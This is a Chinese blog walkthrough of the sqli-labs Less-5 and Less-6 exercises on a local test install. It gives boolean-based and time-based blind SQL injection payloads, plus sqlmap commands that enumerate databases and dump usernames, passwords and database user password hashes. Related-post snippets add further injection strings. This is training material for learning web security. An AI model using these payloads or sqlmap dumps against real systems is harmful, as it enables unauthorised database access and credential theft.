sqli-lab平台练习五、六

最新推荐文章于 2021-05-19 21:08:53 发布
最新推荐文章于 2021-05-19 21:08:53 发布
阅读量253 收藏 1
点赞数
分类专栏: Web安全sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chuxuezheerer/article/details/101980551
版权
本文详细介绍了在sqli-lab平台中,Less-5和Less-6两个关卡的GET方式双注入攻击。通过布尔型和时间型手工注入,演示了如何判断数据库内容、爆破数据库名、表名、字段名及内容。同时,还介绍了利用SQLmap自动化工具进行快速爆破的过程,展示了SQLmap的一些常用命令。
摘要由CSDN通过智能技术生成

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

开始先用常规步骤去试:发现网页没有出现数据库名,即没有出现常规的回显
在这里插入图片描述
我们把这个成为…类似的…盲注?(因为盲注不会有回显,但这个有网页的显示,可能只是开始我们学习,帮助我们判断)

这里总结几个判断数据库内容的函数

  1. 猜测数据库名字的长度:
id=1' and length(database())=8(你所猜测的数据长度) --+

可以看到盲注时只有猜测条件正确是网页会有对应的变化
在这里插入图片描述
不符合条件时:
在这里插入图片描述2.猜测当前数据库有多少表

?id=1' and 1=((select count(*) from information_schema.tables where table_schema='数据库名字')=数据表数)

3.猜测某个表里有多少列:

?id=1' and ((select count(*) from information_schema.columns where table_schema=‘数据库名’ and table_name='数据表名')=猜测列数) --+

那么开始盲注爆破,大概看了一下流程感觉手工注入很麻烦.,需要逐字爆破…

一.布尔型手工注入

布尔型注入,正确网页会回显,错误不回显。
爆破数据库(这里猜测第一个字母):

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s' --+

在这里插入图片描述

盲注中left函数的使用: 函数left(a,b) sql的left()函数表示的是从字符表达式最左边一个字符开始返回指定数目的字符.若 b
的值大于 a 的长度,则返回字符表达式的全部字符a.如果 b 为负值或 0,则返回空字符串. 一般用来猜测库的名字

就这样一点一点试来爆破出库名为security
继续,
爆破表名:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+

通过limit x,1和left第二个参数这两个位置来限定爆破的位置
在这里插入图片描述爆破字段名:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit%201,1),8)='username' --+

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password' --+

爆破字段内容:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left((select username from users order by id limit 0,1),1)='d' --+
  • 注:按照id排序,这样便于对应。注意limit 从0开始
  • mysql对大小写不敏感,所以你不知道是Dumb 还是dumb。

相关函数参考文章:https://blog.csdn.net/qq_41306131/article/details/84799049(SQL盲注中函数的用法)

二.时间型手工注入

时间延迟型注入,正确的会有延迟,错误的不会有反应,可以通过浏览器的状态来进行判断(但这样容易受网络状态影响,比如你的网很慢很慢…)
看到某位大佬的文章感觉说的很全,全程借鉴(感谢https://blog.csdn.net/qq_41420747/article/details/81836327):
本方法中payload = ?id=1’ and if(报错型payload核心部分,sleep(5),1)–+

所以首先猜测数据库长度

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if(length(database())=8,sleep(5),1) --+

当输入正确时,可以看到很明显的延迟:
在这里插入图片描述
同理爆破表名,得到明显延迟:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if( left ( (select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(8),1) --+

爆破列名:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'and if( left ( (select column_name from information_schema.columns where table_name='users' limit%201,1),8)='username',sleep(8),1) --+

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and if( left ( (select column_name from information_schema.columns where table_name='users' limit 2,1),8)='password',sleep(8),1) --+

爆破具体用户名密码的具体内容:然后就慢慢爆破出来就好了…

?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

判断注入点:

http://127.0.0.1/sqli-labs-master/Less-6/?id=1"

发现程序出错,剩下的和五操作一样

这里,我们换一种方法来进行爆破—————当当当当~用鼎鼎大名的sqlmap
首先去网上按教程安装好Python环境和SQLmap

第一步,爆库:可以爆出MySql中所有的库

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" --dbs

执行结果:
在这里插入图片描述
第二步 查找web当前使用的数据库:

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" --dbs

可以看到当前数据库为security
在这里插入图片描述
第二步:列出所有的表:

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" -D security --tables

-D 指定数据库
–tables 列出数据表
在这里插入图片描述
第三步:列出表中字段

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" -D security -T users --columns

-D:指定数据库名称 -T:指定要列出字段的表 --columns:指定列出字段
在这里插入图片描述
第四步:爆字段内容

-C:指定要爆出的字段 --dump:将结果导出

python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" -D security -T users -C"username,password" --dump

在这里插入图片描述
至此,数据库被爆破,简直很方便了

拓展,可以看一看SQLmap一些别的语句的用法:
1.列出MySQL所以用户的名字:

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" --users

在这里插入图片描述
获取当前用户名:

`XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" --current-user

在这里插入图片描述
2.获取当前账户与密码:

XXX>python sqlmap.py -u"127.0.0.1/sqli-labs-master/Less-6/?id=1" --passwords

借鉴文章:
1.https://zhuanlan.zhihu.com/p/35905745(SQL注入之SQLmap)——列举常见命令
2.https://www.jianshu.com/p/17509d0a1ba3(简书:SQLMap基础操作学习)——针对相关sqli-lab平台的

chuxuezheerer
关注
专栏目录
sqli-lab平台注入练习十一,十二,十三
chuxuezheerer的博客
10-07 383
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入) 从11题开始要新的篇章了,这里的注入方式改为了POST注入。 我们首先先应用前10题的一个解题思路来解决这道题,构建注入的语句。 用“”万能密码“来构造, 尝试登陆,发现能行 之后开始进行数据库的爆破: Username: ' union select ...
sqli-labs练习
最新发布
qq_48257021的博客
03-10 867
密码:1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1) #用户名:'union select 1,schema_name from information_schema.schemata limit 0,1#')union select 1,2,3 # base64加密为:Jyl1bmlvbiBzZWxlY3QgMSwyLDMgIw==
sqli-lab注入练习源码
06-25
本套源码是sqli-lab练习sql再好不过,将源码用phpstudy搭建即可开始练习
SQLI-Lab】-Less5
xinyue9966的博客
01-24 254
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-5/?id=1' 进
Sqli-Labs之less-6
ISNS的博客
02-09 711
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程详见: Sqli-Labs之less-5(双注入解法) 最后的结果是: ...
sqli-lab教程Less-6
Brucye
03-23 433
less-6 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 此关运用报错注入 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:selec
sqli-lab平台注入练习一,二
chuxuezheerer的博客
10-02 296
练习一 第一道题是基于错误的单引号字符型错误 照着答案做,一直没报错,满脑子都是????,觉得应该还是不熟,所以先想着往下做 Less-2 GET - Error based - Intiger based (基于错误的GET整型) 对于一个小白选手,首先要区分的就是整型与字符型注入的区别,这里借鉴一些大佬的笔记: 数字型注入意味着,当输入的参数是整型时,如:ID,年龄,页码等。例如URL为:h...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
sqli-lab操作详解
07-12
`sqli-lab`是一个用于学习和实践SQL注入的在线平台,它模拟了多种类型的SQL注入漏洞,帮助用户了解并掌握SQL注入的攻防技巧。通过完成`sqli-lab`的各个挑战,你可以深入理解不同类型的SQL注入,如基于错误的注入、...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQLi-Lab练习笔记(1-10)
uh_eng的博客
05-19 207
Lesson 1字符串注入 验证SQL注入: http://10.10.10.133:8080/Less-1/?id=1’ and ‘1’=‘1 http://10.10.10.133:8080/Less-1/?id=1’ and ‘1’='2 exp: 获取数据库信息: http://10.10.10.133:8080/Less-1/?id=1’ order by 4 %23 //从order by 1到4,得到报错,说明select了三个字段 http://10.10.10.133:808
sqli-lab详解——做题笔记11-20
Dream__Catcher的博客
10-12 1084
这部分的题目都是通过POST方法注入 less-11 基于报错-单引号字符串 在user或者password栏中输入 1’ or 1=1 # 获取信息: 1’ or 1=1 LIMIT 2,1 #2可换成需要的数字 还可以用盲注的方法获得信息(后面补充) less-12 基于报错-双引号字符串变式 在user或者password栏中输入 2") or 1=1 # less-13 双注入-单引号字符...
SQLI-LAB练习的显错注入(自我整理)
qq_43695654的博客
04-18 634
按照惯例,一进来就是先看看情况 页面显示正常,那看看不正常的样子 这样的话可以看出来,没有办法通过union联合查询来注入了,他完全就没有给你回显的地方。。。 这样的话,可以考虑一下显错注入,先让他语句报错,然后在错误里爆出我们想要的东西 报错了啊,那么接下来就是显错注入了,显错注入包括很多方式, 以下均摘自《代码审计:企业级Web代码安全架构》一书: 1.floor() {输出字符长度限...
sqli-labs之less1
giun的博客
01-05 371
在看别人的博客的基础上自己加了些修改 sql-labs之less1 打开题目我们可以看到这样的界面 一、我们先尝试下看是不是get获取请求方式。 在地址栏后面加上?id=1;发现结果是我们所预料的get方式。 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 二、在http://127.0.0.1/sqli-labs-master/Less-1/?i...
记web学习之sql注入
weixin_45508323的博客
11-22 1136
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式与注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
Sqli-labs less 6
lixiangminghate的专栏
06-23 558
转自:lcarmyLess6与less5的区别在于less6在id参数传到服务器时,对id参数进行了处理。这里可以从源代码中可以看到。id=′"′.id=′"′.id.'"';sql="SELECT∗FROMusersWHEREid=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";那我们在这一关的策略和less5的是一样的。只需要将 ' 替换成 " .这里我们...
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2547
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值